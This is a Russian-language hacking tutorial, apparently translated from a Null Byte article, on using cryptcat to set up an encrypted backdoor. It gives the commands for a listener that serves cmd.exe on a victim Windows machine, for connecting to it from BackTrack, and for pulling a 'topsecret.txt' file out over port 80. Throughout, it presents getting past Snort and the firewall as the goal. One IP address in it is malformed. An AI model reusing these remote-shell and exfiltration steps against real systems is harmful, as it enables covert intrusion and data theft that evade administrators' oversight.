Как создать Backdoor с Cryptcat, который почти невозможно обнаружить
Оценка пользователей: / 7
ПлохоОтлично 
CryptcatCryptcat позволяет нам общаться между двумя системами и шифрует связь между ними с помощью twofish - одного из многих прекрасных алгоритмов шифрования.
Ранее мы познакомились с одним маленьким инструментом netcat, который позволяет создать соединение между любыми двумя машинами и передавать файлы или создать командную оболочку для "овладения" системой. Несмотря на красоту и элегантность этого маленького инструмента, он имеет один главный недостаток - передачи между компьютерами могут быть обнаружены такими устройствами безопасности, как брандмауэры и системы обнаружения вторжений (IDS).
В этом уроке познакомимся с популярным кузеном netcat, cryptcat (он на самом деле гораздо симпатичнее и более экзотический, чем простой netcat).
Поскольку шифрование twofish находится на одном уровне с шифрованием AES, то это делает cryptcat практически пуленепробиваемым. Таким образом, IDS не могут выявить вредное поведение даже тогда, когда его маршруты пролегают через такие обычные HTTP-порты 80 и 443.
Шаг 1: Загрузите Cryptcat
Вы можете скачать и установить cryptcat на систему Windows по этой ссылке.
Шаг 2: Откройте слушателя на системе Windows
Мы можем открыть слушателя на любой системе с подобным синтаксисом, как для netcat. В нашем случае, мы открываем слушателя в системе Windows 7 на порту 6996 и создаем командную оболочку.
cryptcat -l -p 6996 -e cmd.еxе
Cryptcat-1
-l означает "открыть слушателя"
-p 6996 означает "разместить слушателя в порту 6996"
-e cmd.еxе означает "запустить командную оболочку для связи"
Шаг 3: Откройте Snort или другую IDS
Теперь, давайте запустим IDS типа Snort на другой системе, которая будет подключаться к системе Windows, чтобы увидеть, способно ли шифрование "ослепить" IDS, оставляя наш черный ход невидимым для подобных устройств безопасности.
Cryptcat-2
Шаг 4: Подключитесь к системе Windows с Cryptcat
Cryptcat по умолчанию установлен на BackTrack, поэтому мы не должны загружать и устанавливать его. Кроме того, он находится в директории /bin, поэтому можем получить доступ к нему из любого каталога.
Теперь подключимся к системе Windows 7 cryptcat из нашей системы BackTrack и посмотрим, можем ли выполнить зашифрованное соединение бэкдор, которое почти невозможно обнаружить.
cryptcat 192.168.4.182.248 6996
Cryptcat-3
Как Вы можете видеть, мы подключены к системе Windows 7 и получили командную оболочку из системы Win 7! Это дает нам значительный контроль над данной системой, но не тотальный, потому что командная оболочка имеет ограниченные возможности.
Шаг 5: Провеоьте журналы Snort и оповещения
Этот тип атаки (прохождение командной оболочки череж сеть) легко обнаруживается с помощью Snort или других IDS, когда соединение не шифруется. Правила Snort предупредят сисадмина, что cmd.exе оболочка проходит сетевое соединение, и они, вероятно, сделают что-то, чтобы удержать Вас от использования этой командной оболочки. С зашифрованным соединением, доступным с cryptcat, эту связь почти невозможно обнаружить.
Давайте вернемся назад и проверим журналы и оповещения в Snort. Если мы были успешными в уклонении от IDS, то не должны увидеть предупреждение о перемещении командной оболочки по сети. Мы можем проверить наши журналы, зайдя в /var/snort/alerts и посмотрев есть ли какие-либо сигналы, вызванные нашей связью с машиной Windows (обычно, мы должны найти предупреждение).
kwritе /var/snort/alerts
Cryptcat-4
Как Вы можете видеть, мы добились успеха. Мы смогли подключиться к системе Windows, не привлекая внимания любой из систем безопасности!
Шаг 6: Отправьте Crypcat через порт 80, чтобы уклониться от брандмауера
Хотя мы успешно создали зашифрованный бэкдор на системе жертвы, пристальный администратор по безопасности заметит, что открытый необычный порт (6996). Это, скорее всего, будет инициировать какое-либо действие администратора по безопасности, чтобы ограничить наш доступ. Кроме того, в системах с хорошим системным администратором и хорошим брандмауэром, этот порт, вероятно, будет заблокирован брандмауэром.
Для любой сети, чтобы иметь возможность общаться в Интернете, скорее всего, нужно держать открытыми порты 80 и 443, но также, возможно, 25, 53 и 110. Поскольку в незашифрованном виде нормальный интернет-трафик проходит через порт 80, который почти всегда открыт, то незначительное увеличение трафика вряд ли замечено.
Теперь, когда мы успешно использовали cryptcat, вышлем его через порт 80 со всем остальным интернет-трафиком. Хотя он зашифрован, но будет выглядеть как и любые двоичные данные, передаваемые в линии. Поэтому будет почти невозможным для выявления устройствами безопасности, чтобы блокировать его, так как они всегда должны позволять трафик через порт 80, а трафик шифруется и IDS не сможет "видеть" его содержимое.
Здесь мы переместим файл из системы жертвы с названием topsecret.txt к нашей атакующей системе без выявления его любым устройством безопасности. На этот раз, вместо отправки командной оболочки через сеть, мы будем посылать совершенно секретный файл с именем topsecret.txt через наше зашифрованное соединение. Мы можем сделать это, набрав в командной строке Windows:
cryptcat -l -p 80 < topsecret.txt
Cryptcat-5
    -l означает "открыть слушателя"
    -p 80 означает "открыть слушателя на порту 80"
    < означает "отправить файл через этого слушателя"
Шаг 7: Подключитесь к слушателю
Теперь давайте подключимся к системе жертвы и вытащим сверхсекретный файл. Все, что нужно сделать, это подключиться к слушателю, набрав cryptcat, IP- адрес системы жертвы и номер порта слушателя.
cryptcat 192.168.182.248 80
Cryptcat-6
Как Вы можете видеть, файл прошел через нашу связь успешно!
Шаг 8 : Проверьте файл оповещений
Давайте еще раз проверим наши файлы журналов Snort для доказательств, что наш IDS не выявил этот трафик сверхсекретного файла.
kwrite /var/snort/alerts
Cryptcat-7
Как Вы можете видеть, наш сверхсекретный файл переместился через порт 80 под носом у системных администраторов, IDS и брандмауэра без следа!
Cryptcat - это отличный маленький инструмент для перемещения данных за пределы системы жертвы через нормально открытые порты без его обнаружения любыми устройствами безопасности.
(Источник EN: null-byte.wonderhowto.com)
 
>
КнигаНовости Практика поискаПартнерыО нас
Підтримка та дизайн: Могильний С.С. Шаблон: Joomla Templates by BuyHTTP Joomla Hosting